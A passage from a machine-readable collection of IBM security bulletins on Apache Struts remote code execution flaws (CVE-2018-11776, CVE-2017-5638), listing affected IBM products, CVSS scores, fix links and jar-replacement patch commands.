\n\n_10.2_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \n**IBM Spectrum LSF Explorer10.1 & 10.2**\n\n 1. Download Apache Struts 2.5.17 from following link, <https://cwiki.apache.org/confluence/display/WW/S2-057>\n 2. Replace the downloaded files (struts2-core-2.5.17.jar, struts2-json-plugin-2.5.17.jar and struts2-spring-plugin-2.5.17.jar) into Explorer installed environment.\n 3. How to find replace files location\n * Navigate to Explorer installed directory\n * run command \u2018find . -name \"*struts*.jar\"\u2019\n\n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-09-25T13:15:02", "type": "ibm", "title": "Security Bulletin: Public disclosed vulnerability from Apache Struts affects IBM Spectrum LSF Explorer", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-09-25T13:15:02", "id": "EF22A73E167DAD8921F1B5310AD0D0D34493E613208B9FFE7D6DF59B309A1D62", "href": "https://www.ibm.com/support/pages/node/729453", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:44:34", "description": "## Summary\n\nThere is a vulnerability in Apache Struts which the IBM FlashSystem\u2122 V840 is susceptible. An exploit of that vulnerability (CVE-2018-11776) could make the system susceptible to attacks which could allow an attacker to execute arbitrary code on the system.\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2018-11776](<https://vulners.com/cve/CVE-2018-11776>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when using results with no namespace and its upper action configurations have no wildcard namespace. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148694> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nStorage Node machine type and models (MTMs) affected:9840-AE1 and 9843-AE1\n\nController Node MTMs affected: 9846-AC0, 9848-AC0, 9846-AC1, and 9848-AC1\n\nSupported storage node code versions which are affected\n\n * VRMFs prior to 1.4.8.1\n * VRMFs prior to 1.5.2.1\n\nSupported controller node code versions which are affected\n\n * VRMFs prior to 7.8.1.8\n * VRMFs prior to 8.1.3.4\n\n## Remediation/Fixes\n\nMTMs | VRMF | APAR | Remediation/First Fix \n---|---|---|--- \n \n**Storage nodes**:\n\n9846-AE1 & 9848-AE1\n\n**Controller nodes**:\n\n9846-AC0, 9846-AC1, 9848-AC0, & 9848-AC1\n\n| \n\nCode fixes are now available, the minimum VRMF containing the fix depending on the code stream:\n\n_Fixed Code VRMF_\n\n1.5 stream: 1.5.2.1\n\n1.4 stream: 1.4.8.1\n\n_Controller Node VRMF_\n\n8.1 stream: 8.1.3.4\n\n7.8 stream: 7.8.1.8\n\n| N/A | FlashSystem V840 fixes for storage node are available @ IBM's Fix Central \n \n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-02-18T15:05:01", "type": "ibm", "title": "Security Bulletin: A vulnerability in Apache Struts affects the IBM FlashSystem V840", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2019-02-18T15:05:01", "id": "47D48C5A9F3802E168F3775B67FEF0A4B25692C1BE0EB29698F35ECDF8F0CD7B", "href": "https://www.ibm.com/support/pages/node/735023", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:45:56", "description": "## Summary\n\nContent Collector for Email, File Systems, Microsoft SharePoint and IBM Connections has addressed publicly disclosed vulnerability found by vFinder: Eclipse Jetty.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2018-11776](<https://vulners.com/cve/CVE-2018-11776>) \n**DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when using results with no namespace and its upper action configurations have no wildcard namespace. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148694> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Content Collector for Email - 4.0.1 \nIBM Content Collector for File Systems - 4.0.1 \nIBM Content Collector for SharePoint - 4.0.1 \nIBM Content Collector for IBM Connections - 4.0.1\n\n## Remediation/Fixes\n\n**Product** | **VRM** | **Remediation** \n---|---|--- \nIBM Content Collector for Email | 4.0.1 | \n\nUse IBM Content Collector for Email 4.0.1.5 [Interim Fix 003](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.5&platform=ALL&function=fixId&fixids=4.0.1.5-IBM-ICC-IF003&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for Email 4.0.1.6 [Interim Fix 00](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.6-IBM-ICC-IF001&source=SAR&function=fixId&parent=Enterprise%20Content%20Management>)[2](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.6&platform=ALL&function=fixId&fixids=4.0.1.6-IBM-ICC-IF002&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for Email 4.0.1.7 [Interim Fix 001](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.7&platform=ALL&function=fixId&fixids=4.0.1.7-IBM-ICC-IF001&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for Email 4.0.1.8 [Interim Fix 007](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.8&platform=ALL&function=fixId&fixids=4.0.1.8-IBM-ICC-IF007&includeRequisites=1&includeSuperse>) \n \nIBM Content Collector for File Systems | 4.0.1 | \n\nUse IBM Content Collector for File Systems 4.0.1.5 [Interim Fix 003](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.5&platform=ALL&function=fixId&fixids=4.0.1.5-IBM-ICC-IF003&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for File Systems 4.0.1.6 [Interim Fix 00](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.6-IBM-ICC-IF001&source=SAR&function=fixId&parent=Enterprise%20Content%20Management>)[2](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.6&platform=ALL&function=fixId&fixids=4.0.1.6-IBM-ICC-IF002&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for File Systems 4.0.1.7 [Interim Fix 001](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.7&platform=ALL&function=fixId&fixids=4.0.1.7-IBM-ICC-IF001&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for File Systems 4.0.1.8 [Interim Fix 007](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.8&platform=ALL&function=fixId&fixids=4.0.1.8-IBM-ICC-IF007&includeRequisites=1&includeSuperse>) \n \nIBM Content Collector for SharePoint | 4.0.1 | \n\nUse IBM Content Collector for SharePoint 4.0.1.5 [Interim Fix 003](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.5&platform=ALL&function=fixId&fixids=4.0.1.5-IBM-ICC-IF003&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for SharePoint 4.0.1.6 [Interim Fix 00](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.6-IBM-ICC-IF001&source=SAR&function=fixId&parent=Enterprise%20Content%20Management>)[2](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.6&platform=ALL&function=fixId&fixids=4.0.1.6-IBM-ICC-IF002&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for SharePoint 4.0.1.7 [Interim Fix 001](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.7&platform=ALL&function=fixId&fixids=4.0.1.7-IBM-ICC-IF001&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for SharePoint 4.0.1.8 [Interim Fix 007](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.8&platform=ALL&function=fixId&fixids=4.0.1.8-IBM-ICC-IF007&includeRequisites=1&includeSuperse>) \n \nIBM Content Collector for IBM Connections | 4.0.1 | \n\nUse IBM Content Collector IBM Connections 4.0.1.5 [Interim Fix 003](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.5&platform=ALL&function=fixId&fixids=4.0.1.5-IBM-ICC-IF003&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector IBM Connections 4.0.1.6 [Interim Fix 00](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.6-IBM-ICC-IF001&source=SAR&function=fixId&parent=Enterprise%20Content%20Management>)[2](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.6&platform=ALL&function=fixId&fixids=4.0.1.6-IBM-ICC-IF002&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector IBM Connections 4.0.1.7 [Interim Fix 001](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.7&platform=ALL&function=fixId&fixids=4.0.1.7-IBM-ICC-IF001&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector IBM Connections 4.0.1.8 [Interim Fix 007](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.8&platform=ALL&function=fixId&fixids=4.0.1.8-IBM-ICC-IF007&includeRequisites=1&includeSuperse>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-11-12T12:55:02", "type": "ibm", "title": "Security Bulletin: Content Collector for Email, File Systems, Microsoft SharePoint and IBM Connections are affected by a publicly disclosed vulnerability found by vFinder: Eclipse Jetty", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-11-12T12:55:02", "id": "BF4651008A331C7D796A1E09F830D542352CF251871DBEED396D2CE654058F5A", "href": "https://www.ibm.com/support/pages/node/730391", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:47:28", "description": "## Summary\n\nIBM Security Guardium has addressed the following vulnerability. \n\n## Vulnerability Details\n\n**CVEID:** [CVE-2018-11776](<https://vulners.com/cve/CVE-2018-11776>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when using results with no namespace and its upper action configurations have no wildcard namespace. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148694> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected IBM Security Guardium**\n\n| \n\n**Affected Versions** \n \n---|--- \nIBM Security Guardium | 10.1.4-10.5 \n \n## Remediation/Fixes\n\n**Product**\n\n| \n\n**VRMF**\n\n| \n\n**Remediation / First Fix** \n \n---|---|--- \nIBM Security Guardium | 10.1.4 | https://www-945.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FInformation+Management%2FInfoSphere+Guardium&fixids=SqlGuard_10.0p413_Apache-Struts-Vulnerability-Fix&source=SAR&function=fixId&parent=IBM%20Security \nIBM Security Guardium | 10.5 | https://www-945.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FInformation+Management%2FInfoSphere+Guardium&fixids=SqlGuard_10.0p512_Sep-24-2018&source=SAR&function=fixId&parent=IBM%20Security \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-09-28T04:30:01", "type": "ibm", "title": "Security Bulletin: IBM Security Guardium is affected by a Publicly disclosed Apache Struts vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-09-28T04:30:01", "id": "B7DFEA0F0D26A9AEA7F776C2117CB1186584920235B808CDC32E52053CB3C6B0", "href": "https://www.ibm.com/support/pages/node/732783", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-02T17:40:17", "description": "## Summary\n\nThere is a vulnerability in Apache Struts which the IBM FlashSystem\u2122 840 and 900 are susceptible. An exploit of that vulnerability (CVE-2018-11776) could make the system susceptible to attacks which could allow an attacker to execute arbitrary code on the system. \n \n\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2018-11776](<https://vulners.com/cve/CVE-2018-11776>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when using results with no namespace and its upper action configurations have no wildcard namespace. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148694> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nFlashSystem 840 machine type and models (MTMs) affected include 9840-AE1 and 9843-AE1. \nFlashSystem 900 MTMs affected include 9840-AE2 and 9843-AE2.\n\nSupported code versions which are affected\n\n * VRMFs prior to 1.4.8.1\n * VRMFs prior to 1.5.2.1\n\n## Remediation/Fixes\n\nMTMs | VRMF | APAR | Remediation/First Fix \n---|---|---|--- \n \nFlashSystem 840 MTMs:\n\n9840-AE1 & 9843-AE1\n\nFlashSystem 900 MTMs:\n\n9840-AE2, 9843-AE2, 9840-AE3, & 9843-AE3\n\n| \n\nCode fixes are now available, the minimum VRMF containing the fix depending on the code stream:\n\n_Fixed Code VRMF_\n\n1.5 stream: 1.5.2.1\n\n1.4 stream: 1.4.8.1\n\n| N/A | FlashSystem 840 fixes and FlashSystem900 fixes are available @ [IBM's Fix Central](<https://www-945.ibm.com/support/fixcentral>) \n \n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-02-18T01:45:50", "type": "ibm", "title": "Security Bulletin: A vulnerability in Apache Struts affects the IBM FlashSystem 840 and 900", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2023-02-18T01:45:50", "id": "7C42BBDFFC97D2C8E3BEC4BE79A23F40E78C2650B91FD356C831E42D0B7EE5EF", "href": "https://www.ibm.com/support/pages/node/735035", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:52:21", "description": "## Summary\n\nAn Apache Struts vulnerability of arbitrary code execution was addressed by IBM Platform Cluster Manager Standard Edition, IBM Platform Cluster Manager Advanced Edition, Platform HPC, and Spectrum Cluster Foundation.\n\n## Vulnerability Details\n\nCVEID: [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>) **DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. CVSS Base Score: 7.3 CVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score CVSS Environmental Score*: Undefined CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nPlatform Cluster Manager Standard Edition Version 4.1.0, 4.1.1 and 4.1.1.1 \nPlatform Cluster Manager Advanced Edition Version 4.2.0, 4.2.0.1, 4.2.0.2 and 4.2.1 \nPlatform HPC Version 4.1.1, 4.1.1.1, 4.2.0 and 4.2.1 \nSpectrum Cluster Foundation 4.2.2\n\n## Remediation/Fixes\n\n_<Product_\n\n| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \n_Platform Cluster Manager Standard Edition_| _4.1.0, 4.1.1, 4.1.1.1, 4.2.0, 4.2.0.1, 4.2.0.2, 4.2.1_| _None_| _See workaround_ \n_Platform Cluster Manager Advanced Edition_| _4.2.0, 4.2.0.1, 4.2.0.2, 4.2.1_| _None_| _See workaround_ \n_Platform HPC_| _4.1.1, 4.1.1.1, 4.2.0, 4.2.1_| _None_| _See workaround_ \n_Spectrum Cluster Foundation_| _4.2.2_| _None_| _See workaround_ \n \n## Workarounds and Mitigations\n\nPlatform Cluster Manager 4.2.1 & Platform HPC 4.2.1 & Spectrum Cluster Foundation 4.2.2 \n1 Download the struts-2.3.32-lib.zip package from the following location:[_http://archive.apache.org/dist/struts/2.3.32/_](<http://archive.apache.org/dist/struts/2.3.32/>) \n2 Copy the struts-2.3.32-lib.zip package to the management node. \n3 Extract the struts-2.3.32-lib.zip package on the management node. \n# mkdir -p /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/struts2-core-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/struts2-json-plugin-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/struts2-spring-plugin-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/xwork-core-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/freemarker-* /root/backup \n \n# unzip struts-2.3.32-lib.zip # cd struts-2.3.32/lib # cp xwork-core-2.3.32.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib # cp struts2-core-2.3.32.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib # cp struts2-jasperreports-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib # cp struts2-json-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib # cp struts2-spring-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib # cp freemarker-2.3.22.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib \n4 Restart Platform HPC services. If high availability is enabled, run the following commands on the active management node: \n# pcmhatool failmode -m manual # pcmadmin service stop --service WEBGUI # pcmadmin service start --service WEBGUI # pcmhatool failmode -m auto \nOtherwise, if high availability is not enabled, run the following commands on the management node: \n# pcmadmin service stop --service WEBGUI # pcmadmin service start --service WEBGUI \n \n**Platform Cluster Manager 4.2.0 4.2.0.x & Platform HPC 4.2.0 4.2.0.x** \n \n1 Download the struts-2.3.32-lib.zip package from the following location:[_http://archive.apache.org/dist/struts/2.3.32/_](<http://archive.apache.org/dist/struts/2.3.28/>) \n2 Copy the struts-2.3.32-lib.zip package to the management node. \n3 Extract the struts-2.3.32-lib.zip package on the management node. \n4 # mkdir -p /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-core-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-json-plugin-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-spring-plugin-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/xwork-core-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/freemarker-* /root/backup \n \n# unzip struts-2.3.32-lib.zip # cd struts-2.3.32/lib # cp xwork-core-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp struts2-jasperreports-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp struts2-core-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp struts2-json-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp struts2-spring-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp freemarker-2.3.22.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n \n5 Restart Platform HPC services. If high availability is enabled, run the following commands on the active management node: \n# pcmhatool failmode -m manual # pcmadmin service stop --service WEBGUI # pcmadmin service start --service WEBGUI # pcmhatool failmode -m auto \nOtherwise, if high availability is not enabled, run the following commands on the management node: \n# pcmadmin service stop --service WEBGUI # pcmadmin service start --service WEBGUI \n \n**Platform Cluster Manager 4.1.x & Platform HPC 4.1.x** \n1 Download the struts-2.3.32-lib.zip package from the following location:[_http://archive.apache.org/dist/struts/2.3.32/_](<http://archive.apache.org/dist/struts/2.3.28/>) \n2 Copy the struts-2.3.32-lib.zip package to the management node. \n3 Extract the struts-2.3.32-lib.zip package on the management node \n# mkdir -p /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-core-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-json-plugin-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-spring-plugin-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/xwork-core-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/freemarker-* /root/backup \n \n# unzip struts-2.3.32-lib.zip # cd struts-2.3.32/lib/ # cp xwork-core-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp struts2-core-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp struts2-json-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp struts2-spring-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp freemarker-2.3.22.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp struts2-jasperreports-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n4 Restart Platform HPC services. If high availability is enabled, run the following commands on the active management node: \n# pcmhatool failmode -m manual # pmcadmin stop # pmcadmin start # pcmhatool failmode -m auto \nOtherwise, if high availability is not enabled, run the following commands on the management node: \n# pmcadmin stop # pmcadmin start \n \n \nIf providing a mitigation add this line to this section: \nIBM recommends that you review your entire environment to identify vulnerable releases of the Open Source Apache Struts Vulnerabilities Collections and take appropriate mitigation and remediation actions. \n \n \n**Important note: **IBM strongly suggests that all System z customers subscribe to the System z Security Portal to receive the latest critical System z security and integrity service. If you are not subscribed, see the instructions on the [_System z Security web site_](<http://www.ibm.com/systems/z/solutions/security_subintegrity.html>). Security and integrity APARs and associated fixes will be posted to this portal. IBM suggests reviewing the CVSS scores and applying all security or integrity fixes as soon as possible to minimize any potential risk.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": 